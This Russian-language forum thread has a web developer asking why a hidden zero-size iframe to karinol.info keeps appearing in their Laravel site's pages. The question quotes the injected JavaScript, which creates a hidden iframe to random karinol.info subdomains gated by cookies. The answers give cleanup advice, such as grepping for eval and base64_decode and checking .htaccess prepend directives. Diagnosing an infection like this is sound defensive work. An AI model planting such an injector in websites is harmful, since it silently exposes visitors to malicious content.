Задать вопрос
Sky4eg
@Sky4eg
Web разработчик

Расположение iframe, появляется случайным образом?

Добрый день, на сайте случайным образом появляется следующий iframe. Сайт на fw laravel 3

<iframe src="http://satiram.karinol.info" width="0" height="0" align="left"></iframe>


он может появится в любой части при просмотре исходного кода. Появляется когда ему вздумается. Исходники сайта чистые, левых строк в файлах конфигурации nginx и httpd нет… Куда копать?



UPD. grep -r «karinol». ничего не дает

P.S. как проверить картинки на наличие вредоносного кода?



UPD 2. Единственное упоминание о вирусе

};var ifbsTkv = document.createElement('iframe');ifbsTkv.name = 'ifbsTkv';ifbsTkv.src = 'http://'+genstrdom(Math.floor(Math.random() * 20) + 5)+'.'+'karinol.info/';ifbsTkv.style.width = '0px';ifbsTkv.style.height = '0px';window.onload = function() {document.cookie = 'chcook=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT'; if ((document.cookie.indexOf('ifbsTkv=') == -1) && (document.cookie.indexOf('chcook=') != -1)) { document.getElementsByTagName('body')[0].appendChild(ifbsTkv);var expiresDate = new Date(); expiresDate.setTime(expiresDate.getTime() + 432000000); setTimeout(function() { document.cookie = 'ifbsTkv=yes; path=/; expires=' + expiresDate; }, 5000);}};function genstrdom(length) {var st = '';var chars = 'abcdefghijklmnopqrstuvwxyz0123456789';for (i=1;i<length;i++) {var c = Math.floor(Math.random()*chars.length + 1);st += chars.charAt(c)}return st;}<span style="line-height: 1.6em;"></span>




urlvir.ru/blog/99-novyj-vid-virusa-shturmuet-inter...
  • Вопрос задан
  • 3822 просмотра
Подписаться 5 Оценить 2 комментария
Пригласить эксперта
Ответы на вопрос 8
PaulZi
@PaulZi
Думаю скорее всего нужно искать сторонние <script src="..."></script> или <script>...</script> на сайте, которые и вставляют уже iframe.
Ответ написан
Комментировать
@WEBIVAN
Поздравляю, вы словили вирус.
1)Меняем доступы к ФТП
2)Делаем поиск по .php файлам на предмет наличия eval, base64_decode, preg_replace к ключом \e, preg_replace_callback
3)Анализируем найденное, вычищаем зловреда
Ответ написан
CodeByZen
@CodeByZen
php, js, my/mssql, sqlite, html, css, it-consult
Как вариант, посмотрите в htaccess, там может быть что-то типа php_value auto_append_file append.php или php_value auto_prepend_file append.php
Ответ написан
Mendel
@Mendel
PHP-developer
Посмотрите на даты изменения файлов. Далеко не все вирусы за собой это подчищают.
Ответ написан
MiXei4
@MiXei4
iframe появляется во всех браузерах, на всех компьютерах? Может это просто какое-нибудь расширение вставляет…
Ответ написан
@signalizator
По всем файлам js и php пробегитесь на предмет поиска «karinol» или «ifbsTkv».
Ответ написан
@Lomzik
Отключите всё JS файлы (библиотеки, счетчики, анализаторы и т.д.) и проверьте результат.
Ответ написан
@noonesshadow
Проверьте файлы js библиотек, в частности jQuery, на соответствие оригиналам
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы